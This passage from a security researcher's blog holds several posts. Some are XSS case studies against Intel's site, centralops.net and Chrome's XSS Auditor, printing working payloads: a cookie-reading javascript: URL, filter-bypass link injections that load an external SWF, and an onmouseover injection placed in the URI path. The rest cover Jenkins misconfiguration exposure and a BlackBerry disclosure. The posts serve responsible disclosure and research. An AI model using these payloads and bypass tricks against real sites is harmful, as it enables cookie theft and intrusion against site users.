<i>Found file of type "png" in session [<a href="http://50.116.98.95:20480/" style="color: #1155cc;" target="_blank">50.116.98.95:20480</a> -> <a href="http://172.31.2.41:14528/" style="color: #1155cc;" target="_blank">172.31.2.41:14528</a>], exporting to dump/00000002.png</i></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8000001907349px;">
<i>Found file of type "html" in session [<a href="http://50.116.98.95:20480/" style="color: #1155cc;" target="_blank">50.116.98.95:20480</a> -> <a href="http://172.31.2.41:14272/" style="color: #1155cc;" target="_blank">172.31.2.41:14272</a>], exporting to dump/00000003.html</i></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8000001907349px;">
<i>Found file of type "png" in session [<a href="http://50.116.98.95:20480/" style="color: #1155cc;" target="_blank">50.116.98.95:20480</a> -> <a href="http://172.31.2.41:14272/" style="color: #1155cc;" target="_blank">172.31.2.41:14272</a>], exporting to dump/00000004.png</i></div>
<br />
You can also check extending TCPExtract in Python:<br />
<br />
1.<b> <a href="http://nullege.com/codes/search/TcpExtract.FileExtractor">http://nullege.com/codes/search/TcpExtract.FileExtractor</a></b><br />
2. Another solution :<b> <a href="http://computer.forensikblog.de/en/2005/10/tcpxtract-version-10.html">http://computer.forensikblog.de/en/2005/10/tcpxtract-version-10.html</a></b><div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com2tag:blogger.com,1999:blog-30098758.post-16669545958958344302014-08-08T09:41:00.000-07:002014-08-08T09:41:27.773-07:00C-SCAD Tool Presentation and Tool AvailableThe project page of C-SCAD tool has been updated. Please check the details here: <a href="http://cscad.secniche.org/"><b>http://cscad.secniche.org</b></a><br />
<br />
<center>
<iframe allowfullscreen="" frameborder="0" height="356" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/37806634" style="border-width: 1px; border: 1px solid #CCC; margin-bottom: 5px; max-width: 100%;" width="427"> </iframe> <div style="margin-bottom: 5px;">
<strong> <a href="https://www.slideshare.net/adityaks/blackhat-arsenal-2014-cscad" target="_blank" title="BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Client (Penetration Testing)">BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Client (Penetration Testing)</a> </strong> from <strong><a href="http://www.slideshare.net/adityaks" target="_blank">Aditya K Sood</a></strong> </div>
</center>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-43785098631525862762014-02-16T16:05:00.000-08:002014-02-16T16:05:20.575-08:00Intel XSS and Google Chrome XSS Auditor Bypass : Application Design Matters! Its True !<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Last time, I talked about the role of application design in impacting the state of client-side XSS filters. You can read that blog post here: <a href="http://zeroknock.blogspot.com/2013/12/web-application-design-does-matter.html"><b><i>http://zeroknock.blogspot.com/2013/12/web-application-design-does-matter.html</i></b></a>. However, concentrating on that hypothesis, another case study came to my notice. I notified a Cross-site Scripting (XSS) bug in the Intel retailer website. The Intel security team removed the vulnerable web page from the its Internet facing environment. <b>Responsible disclosure is the way to go.</b><br />
<br />
<b>What's the learning lesson here? </b>Occurrences of XSS vulnerabilities are not new but the interesting part is how the vulnerable application impacts the browser defined security components such as XSS filters. In this case study, Google Chrome XSS auditor (enabled by default) again fails to perform the desired work for what is designed for.<br />
<br />
The idea here is not to show that there is an XSS bug in Intel website rather to show execution of XSS payloads depends on the application design and there is always an unexpected behavior. Even sophisticated client-side XSS filters can be bypassed easily. I do not have time to investigate what caused the XSS payload to bypass Chrome's XSS auditor. I will notify the Google Chrome team so that they can take a look into it.<br />
<br />
<b>Proof-of-Concept:</b> I used the very simple payload : <i>JavaScript:alert(document.cookie)</i> in "URL" parameter for the vulnerable redirect.asp webpage.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvTNsjuz7pzCQOad4KCWP3d74BXPOUPpQpOU6zt06iiH5wqQAspwGr6jy1zt9QpitR4k6V6j7uej-sGBKXGP0_Xuw24c9cDJJnXOURlgGXLPw9GdC23dwJkTjZUemhIr4FHFEg0Q/s1600/google_chrome_bypass2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvTNsjuz7pzCQOad4KCWP3d74BXPOUPpQpOU6zt06iiH5wqQAspwGr6jy1zt9QpitR4k6V6j7uej-sGBKXGP0_Xuw24c9cDJJnXOURlgGXLPw9GdC23dwJkTjZUemhIr4FHFEg0Q/s1600/google_chrome_bypass2.png" height="363" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Injected XSS Payload !<br /><div style="text-align: left;">
<br /></div>
</b></td></tr>
</tbody></table>
<div>
The payload gets embedded as a hyperlink in the webpage. Amazingly, the XSS auditor accepted to render that payload. So, the XSS injection worked successfully and resulted in cookie extraction.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBGJCR9aen9FGufJVkVMrzC_eOBB6vqRmpMUV-X9vSo6ad8OhUfrAqYilqRVgd5S4yBPA1sdVqRfsxib8hS3X3B3F6hl0nBAfFoc8XXYxZjPGavUFaak0u2mh6reyEFjv4J7egxQ/s1600/google_chrome_bypass3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBGJCR9aen9FGufJVkVMrzC_eOBB6vqRmpMUV-X9vSo6ad8OhUfrAqYilqRVgd5S4yBPA1sdVqRfsxib8hS3X3B3F6hl0nBAfFoc8XXYxZjPGavUFaak0u2mh6reyEFjv4J7egxQ/s1600/google_chrome_bypass3.png" height="374" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Successful XSS Injection !</b></td></tr>
</tbody></table>
<div>
Keep on trying !<br /></div>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-70551405526836035202014-01-07T18:42:00.000-08:002014-01-07T19:50:55.233-08:00Code Nuances (or Bypassing XSS Filters) : Centralops.net Case StudyIt is always fun to play around with deployed security mechanisms that are used for subverting application layer attacks. It is much more interesting to target applications enabled with protections (or that throw code nuances) rather attacking protection-free applications. A simple case study of centralops.net is presented below.<br />
<br />
<b>Acknowledgement: </b>I would like to thank Gavin from Hexillion Group (<a href="http://hexillion.com/">http://hexillion.com/</a>) for patching this issue within few hours.<br />
<br />
<b>Case Study:</b> Recently working on a domain dossier (<a href="http://www.centralops.net/">http:///www.centralops.net</a>) website for my ongoing research, I came across with interesting scenario where I have to bypass some glitches in the code (or filter) to execute the XSS code. I wanted to perform link injection with payload :<br />
<blockquote class="tr_bq">
"/>&<a href="http://0x.lv/xss.swf"> Injecting SWF Payload </a></blockquote>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGvMczZb5gAyTBFSfJLNFrXRS5IEczFVSYa1naX93bWBJ6QSxIl8xSfg7cjy35Mh5emmDjTdexj7mMgIfusBuhESjbXWZsR-5g_Q_5bvYkOJ_SOQjIMaHDetweWZOsoP3tEaZSig/s1600/centralops_xss_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGvMczZb5gAyTBFSfJLNFrXRS5IEczFVSYa1naX93bWBJ6QSxIl8xSfg7cjy35Mh5emmDjTdexj7mMgIfusBuhESjbXWZsR-5g_Q_5bvYkOJ_SOQjIMaHDetweWZOsoP3tEaZSig/s400/centralops_xss_1.png" height="180" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Error due to Injection !</b></td></tr>
</tbody></table>
<br />
The error I encountered was: <i><b>"has multiple items separated by spaces, but only one input is allowed at a time. Domain Dossier will continue with"</b></i><br />
<br />
The error clearly indicates that the input has to be provided as one value. It means the injection payload has to be pushed as one value. I tried a number of payloads with different meta characters which resulted in same responses until I found the XSS payload that bypassed everything in this scenario. <i> I played around with the white spaces and tried to remove them with certain characters that allowed me to execute the JavaScript (one can find more payloads but depending on the time, I was satisfied with that because the bypass was done already). Overall it was a game play for 10 minutes.</i><br />
<br />
<blockquote class="tr_bq">
Original : "/><a href="http://0x.lv/xss.swf"> Injecting SWF Payload </a><br />
Bypass:<b> "/><a//href="http:</b>//0x.lv/xss.swf"><b>Injecting_SWF_Payload</b></a><br />
Bypass: <b>"/><a/href="http:/</b>/0x.lv/xss.swf"><b>Injecting_SWF_Payload</b></a> </blockquote>
<b>Note:</b> I used <b>"/", "//" and "_"</b> characters to treat the payload as one value and pushed it. As a result injection occurs as follows: <br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPSbMUZ8gqAIkVhOiSeVvb2wxlts-VzVgHfh8z1mD0rSujXQVd-0DVv9sQPKRWNGVQq3qx0EoSMR6_clP-8m2h_rgJM8WeRMpycMoFGFrL2YcLbci24beExLu0mW1n1SVJbedxHQ/s1600/centralops_xss_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPSbMUZ8gqAIkVhOiSeVvb2wxlts-VzVgHfh8z1mD0rSujXQVd-0DVv9sQPKRWNGVQq3qx0EoSMR6_clP-8m2h_rgJM8WeRMpycMoFGFrL2YcLbci24beExLu0mW1n1SVJbedxHQ/s400/centralops_xss_2.png" height="166" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Successful Rendering of XSS Payload !</b></td></tr>
</tbody></table>
The supplied payload resulted in successful XSS injection in the target application.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAcJv2YLYrd0AddHf33OAQGkcXtP9SOYqOTNNjHRaBzDslQq01QSkPmikVIXnNtXn5vIOv9tQiktepxgGa0nEWyhLU5HvSDR92nGoz9JAVMNFp3a0ftJhjEzlwF7RFJ5VYeY8twg/s1600/centralops_xss_3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAcJv2YLYrd0AddHf33OAQGkcXtP9SOYqOTNNjHRaBzDslQq01QSkPmikVIXnNtXn5vIOv9tQiktepxgGa0nEWyhLU5HvSDR92nGoz9JAVMNFp3a0ftJhjEzlwF7RFJ5VYeY8twg/s400/centralops_xss_3.png" height="185" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Successful Execution of Payload !</b></td></tr>
</tbody></table>
<br />
<b>What do we learn from this?</b><br />
During past years, I feel its more important to understand how exactly the attack is executed (analyzing the underlying components) . As per my experience, one attack vector might not work in all target environments, so we have to build a new one every time.<b> In a number of earlier scenarios, I have seen that if we tamper the whitespaces between HTML attributes and tags, the code fails to render properly in the application. But, in this case study, we are required to embed additional characters in the payload for passing the payload as one value to the application.</b><br />
<br />
<b>Inference: </b><br />
<b><br /></b>
<b>(1) Understand the error and develop appropriate combinations to overcome nuances (or bypass XSS filters).</b><br />
<b>(2) Design XSS payload as per target environment.</b><br />
<br />
Enjoy !<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-19595991649164014352014-01-01T11:45:00.000-08:002014-01-02T11:36:31.568-08:00Reported Jenkins Vulnerability Patched by BlackBerry !<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWGmozMzQY81jIvg-i00nWVd5qg7JKRusSqVlzyfZbDAzf0FWC3u6IixhbnPewBHw9vOHxBGTua2Z7uqCsxQsRzRHrZNxPLF4U7IqwN8U-wQyLRYhlM2xRHYy6-RKgIQCG1nq6Aw/s1600/Blackberry_fruit.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWGmozMzQY81jIvg-i00nWVd5qg7JKRusSqVlzyfZbDAzf0FWC3u6IixhbnPewBHw9vOHxBGTua2Z7uqCsxQsRzRHrZNxPLF4U7IqwN8U-wQyLRYhlM2xRHYy6-RKgIQCG1nq6Aw/s200/Blackberry_fruit.jpg" width="143" /></a></div>
A couple of months ago, I discussed about the existence of configuration flaws in deployment of Jenkins software management application. The details are presented here: <a href="http://zeroknock.blogspot.com/2013/08/protect-your-software-development-web.html"><b>Jenkins Configuration Issues</b>.</a> Based on the same benchmark, I reported a few vulnerabilities to BlackBerry in its infrastructure. Recently, I found that they added my name to the responsible disclosure list here: <a href="http://ca.blackberry.com/business/topics/security/incident-response-team/collaborations.html"><b>BlackBerry Responsible Disclosure List!</b></a>.which is fine as long as the team eradicates the vulnerability.<br />
<br />
Nowadays, I do not perform aggressive vulnerability hunting (due to my ongoing job) but, when I have time, I dissect components of widely used software and try to find flaws in them. I am more interested in the cases where companies understand the problem and ready to patch it. I am not at all inclined towards finding generic issues in websites which nobody cares about.<b> </b><i>I always believe that it is important to understand the cons associated with that existing vulnerability when it is reported. It is also crucial to determine how the attacker can chain together a set of bugs to have greater impact. If we don't understand the nitty-gritty details of the vulnerability, there is high chances that the vulnerability will resurface again. </i><br />
<br />
In this case of BlackBerry, unnecessary exposure of Jenkins component in production environment could resulted in problematic scenarios. Exposed components of Jenkins were vulnerable to flaws such as Injections, XSS, etc. So, the belief is: <b>"Expose Less and Be Secure !"</b><br />
<br />
<b>Note</b>: I am going to reveal Frame Injection vulnerability to Jenkins team so that the issue can be patched. No details for now.<br />
<br />
Enjoy !<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-87806657644750384932013-12-29T08:09:00.000-08:002014-03-06T06:14:56.802-08:00Web Application Design Does Matter - Google Chrome XSS Auditor Bypass : Version <= 32.0.1700.41 m Aura !<b>Update (6th March 2014) : </b>The post is also discussed on Stack Overflow here: <a href="https://stackoverflow.com/questions/22202323/bypass-the-chrome-xss-auditor-by-changing-attributes-in-forms" style="font-weight: bold;">https://stackoverflow.com/questions/22202323/bypass-the-chrome-xss-auditor-by-changing-attributes-in-forms</a>, for additional discussion by the users.<br />
<b><br /></b>
<b>Update:</b> The bug has been reported to Google Chrome team already. The details can be found here: <b><a href="https://code.google.com/p/chromium/issues/detail?id=330972">https://code.google.com/p/chromium/issues/detail?id=330972</a>. </b>The team was not able to recreate the issue in the test environment. I validated this issue on the Command and Control (C&C) panel of a botnet :) and I was not in a state to reveal the details of that panel. Anyways the bug is in Wont Fix state and Google Chrome is still vulnerable to these types of XSS bypasses.<br />
<br />
Recently, I encountered an XSS auditor bypass in Google Chrome ( &lt;= 32.0.1700.41 m Aura) while working on my research.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNwZC_ulkko2kHXyEjsjx8BtqYr-HT9uhOS-UbpKufFkZJroKHUSVXrJG5_R8quHjJp9hVBA7GYVZYdtOUK-VXi2zQQBi_1UVMFk2I1CmLMNHW1IOQO3QhhEYfbpnMg0CdGv2c-Q/s1600/google_chrome.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNwZC_ulkko2kHXyEjsjx8BtqYr-HT9uhOS-UbpKufFkZJroKHUSVXrJG5_R8quHjJp9hVBA7GYVZYdtOUK-VXi2zQQBi_1UVMFk2I1CmLMNHW1IOQO3QhhEYfbpnMg0CdGv2c-Q/s320/google_chrome.png" height="149" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Google Chrome Latest Version Tested !</b></td></tr>
</tbody></table>
Although, the XSS auditor in Google Chrome is a client-side XSS filter that eradicates the reflective XSS attacks right away. One point that should be taken into consideration that, sometimes the design of the web application also impacts the working of XSS auditor leading to creating such scenarios which are not expected. Anyways, let's analyze a bypass in latest (and earlier) versions of Google Chrome browser. The web page URL looks like as follows:<br />
<blockquote class="tr_bq">
<b>http://www.example.com/index.php?m=login </b>which generates the form as follows:</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFvI9S15lbrsT2O1QX4kS8fmG9hwW9zWPFZlaRpuJVcFb5LhwehOvp6qP3gckWdIONUpDs8IVNMGa_-FHYMwDKhuXleWix5_40QMYOxGjHlCRNc5pSNXVJ6kloQ7xQCjacGqLgqQ/s1600/form_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFvI9S15lbrsT2O1QX4kS8fmG9hwW9zWPFZlaRpuJVcFb5LhwehOvp6qP3gckWdIONUpDs8IVNMGa_-FHYMwDKhuXleWix5_40QMYOxGjHlCRNc5pSNXVJ6kloQ7xQCjacGqLgqQ/s640/form_1.png" height="180" width="640" /></a></div>
<br />
For Injection, we crafted the URL as follows:<br />
<blockquote class="tr_bq">
<b>http://www.example.com/index.php/" onmouseover="JavaScript:alert(document.location)" name="?m=login . </b></blockquote>
In this injection, we have not injected in "m" parameter rather we have played with the URI structure. The idea is to tweak the form layout rather the value accepted by the "m" parameter.<b> If you place your injection in "m" parameter, it gets nullified by the XSS Auditor</b>. Let's see how the injection occurs:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdaFw8uQkJck4FjpU3JGdeecJlCwh2re7G5gI4gkolyDRKL0R_xXtxVc0O8CAB_b90lllf6zI7L4nhC8VAibIaa7qcbFEycxRAWPxbCeo66G1IqO8uQsVmdZ_Fvn4qljYldIg-Fg/s1600/form_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdaFw8uQkJck4FjpU3JGdeecJlCwh2re7G5gI4gkolyDRKL0R_xXtxVc0O8CAB_b90lllf6zI7L4nhC8VAibIaa7qcbFEycxRAWPxbCeo66G1IqO8uQsVmdZ_Fvn4qljYldIg-Fg/s640/form_2.png" height="182" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As a result, Google Chrome XSS auditor is bypassed.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRQyMQ0uufD50qpjvo4In9P4N0-CdD79DeMYoQpd8OTFXTrWXfDYBNc9bl9hJn2wv21os7u-mUYvT3LInehDSOZvXpCjQK0GmUvhFCSm-msPz_ubvjaS2o6pzdLCObjpCkPvXfSg/s1600/gc_xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRQyMQ0uufD50qpjvo4In9P4N0-CdD79DeMYoQpd8OTFXTrWXfDYBNc9bl9hJn2wv21os7u-mUYvT3LInehDSOZvXpCjQK0GmUvhFCSm-msPz_ubvjaS2o6pzdLCObjpCkPvXfSg/s640/gc_xss.png" height="324" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Inference:</b> Few ideas that should be taken into consideration:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
1. The design of web applications impact the XSS auditor.</div>
<div class="separator" style="clear: both; text-align: left;">
2. Instead of always targeting the HTTP parameters, play around with the URI structure also.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Note:</b> Internet Explorer blocked this vector.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Additional Readings: Check out the inside details of Google Chrome XSS Auditor:</b></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li>XSS Auditor Source Code : <a href="https://code.google.com/p/webkit-mirror/source/browse/Source/WebCore/html/parser/XSSAuditor.cpp"> https://code.google.com/p/webkit-mirror/source/browse/Source/WebCore/html/parser/XSSAuditor.cpp</a></li>
<li>More about XSS Auditor Read here: <a href="http://www.collinjackson.com/research/xssauditor.pdf">http://www.collinjackson.com/research/xssauditor.pdf</a></li>
</ul>
<div class="separator" style="clear: both; text-align: left;">
Enjoy !</div>
<br /><div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-79878592127070577732013-08-25T22:35:00.000-07:002013-08-30T19:25:59.425-07:00CCTV Cameras : An Interview for Fact or Fictional Show : Revision 3!<div class="separator" style="clear: both; text-align: left;">
Recently, I did an interesting interview with Veronica from Fact or Fictional show on the Internet. We discussed about the issues and technology behind CCTV cameras. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<center>
<iframe allowfullscreen="" height="360" mozallowfullscreen="" msallowfullscreen="" oallowfullscreen="" src="http://revision3.com/html5player-v24018?external=true&width=640&height=360" webkitallowfullscreen="" width="640"></iframe>
</center>
<br />
Do not forget to watch the movie on this topic-- "Closed Circuit" ! starring Eric Bana and Rebecca Hall.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCgK0IPGk9V4E6DhLq0AwRmeIJ6cDYUYuz5kO_FzpZf5DmMFFYdulfOYlhbU1L9Ukr_LgYKME0qF7C7g3ksx36y8gufw9StEwF1RZJ9qX3nky_RJxPqZp5LfpZ9tHwIBVU4-vvZQ/s1600/closed.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCgK0IPGk9V4E6DhLq0AwRmeIJ6cDYUYuz5kO_FzpZf5DmMFFYdulfOYlhbU1L9Ukr_LgYKME0qF7C7g3ksx36y8gufw9StEwF1RZJ9qX3nky_RJxPqZp5LfpZ9tHwIBVU4-vvZQ/s200/closed.jpg" width="135" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Source: <b><a href="http://www.imdb.com/title/tt2218003/">http://www.imdb.com/title/tt2218003/</a></b></div>
<div class="separator" style="clear: both; text-align: left;">
Fact or Fiction Source: <b><a href="http://revision3.com/factorfictional/closed-circuit">http://revision3.com/factorfictional/closed-circuit</a></b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com1tag:blogger.com,1999:blog-30098758.post-41061188881545873452013-08-25T20:48:00.001-07:002013-08-25T20:48:50.355-07:00Protect Your Software Development Web Interfaces - Information Lumps: A Case Study of Jenkins !<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXYYrjDlki2JSzl-XHnVNhdd6cbLiO4_OJokJzMDH0tNsn8LaRvMYbM0zOGDmMim5xHjG7B3FN03rA506l6AWmGr1Gima1OrBlqGUMX3AT4Cucsv4jp4kjUX7HemNGBFeDfadxpw/s1600/jenkins.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXYYrjDlki2JSzl-XHnVNhdd6cbLiO4_OJokJzMDH0tNsn8LaRvMYbM0zOGDmMim5xHjG7B3FN03rA506l6AWmGr1Gima1OrBlqGUMX3AT4Cucsv4jp4kjUX7HemNGBFeDfadxpw/s1600/jenkins.png" /></a></div>
<div class="separator" style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11pt;">Automation of software development
practices through applications has become the defacto standard in the security industry. Organizations
are using support applications to reduce the workload in building and updating
software. The basic idea behind this
post is to check how security is structured for software management applications
such as Jenkins in a real time scenarios and what we need to look into while
performing security assessments. Before discussing further, let's talk about
Jenkins. According to the software website: "<i>Jenkins is an application that monitors executions of repeated jobs,
such as building a software project or jobs run by cron.".</i> For more
details, you can read here: </span><a href="https://wiki.jenkins-ci.org/display/JENKINS/Meet+Jenkins"><span style="font-size: 11.0pt;"><b>https://wiki.jenkins-ci.org/display/JENKINS/Meet+Jenkins</b></span></a><span style="font-size: 11pt;"><b>.</b><o:p></o:p></span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<br /></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;">From software development perspective, Jenkins provides an
integrated system which developers can use to manage software changes made
to specific projects. It has been noticed that, although organizations use this
software, but misconfigured interfaces (not running inside firewall and
improper access rights) could have substantial impact. From security
perspective, exposure of an integrated system that manages software development
model could become a sensitive risk. To prove this fact, a case study of
Jenkins application is discussed in which it is shown that how misconfigured
and exposed interfaces could result in potential security glitches. </span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;">These tests are conducted in an open environment. It has been
found that several of the big companies use Jenkins and with no surprises the
interfaces are exposed and running with improper authentication. In addition to
this, there are numbers of Jenkins systems that are Internet facing and expose
plethora of information to the attackers (remote users). A misconfigured
Jenkins server results in disclosure of critical information that can be used
in different set of attacks. A number of misconfiguration issues are presented
below that result in information disclosure: </span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-size: 11pt;"><b><span style="font-family: Arial, Helvetica, sans-serif;">Note: Based on this security issues, a few vulnerabilities have been reported to industry leaders (organizations) which have recognized the issue. I will release the details once the issue is patched.</span></b></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<b><span style="font-size: 11pt; line-height: 115%;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></b></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="font-size: 11pt; line-height: 115%;">Developers Information:</span></b><span style="font-size: 11pt; line-height: 115%;"> Exposed Jenkins interface
reveals information about the developers participating in the software
projects. It is possible to extract userids of the registered accounts with
associated names. This is a substantial point of gaining information about the
users of a specific organization. An example of the exposed user details is shown below:</span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11pt; line-height: 115%;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjao8wTmPvreZJj_RWbOWOeQ4kj7eShyphenhyphenA7leO7i2m5V2idbEqYskL1PUVuKRfRbbTDxPJi0wb743q7gXs9dbpGTte5P5kFozzTWwNf6VJbUgKwQZ418fwufqZA09Fq4f2Tb9EasCQ/s1600/jenkins_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjao8wTmPvreZJj_RWbOWOeQ4kj7eShyphenhyphenA7leO7i2m5V2idbEqYskL1PUVuKRfRbbTDxPJi0wb743q7gXs9dbpGTte5P5kFozzTWwNf6VJbUgKwQZ418fwufqZA09Fq4f2Tb9EasCQ/s1600/jenkins_1.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Exposed Developers Information !</b></td></tr>
</tbody></table>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"><br /></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="font-size: 11pt; line-height: 115%;">Software
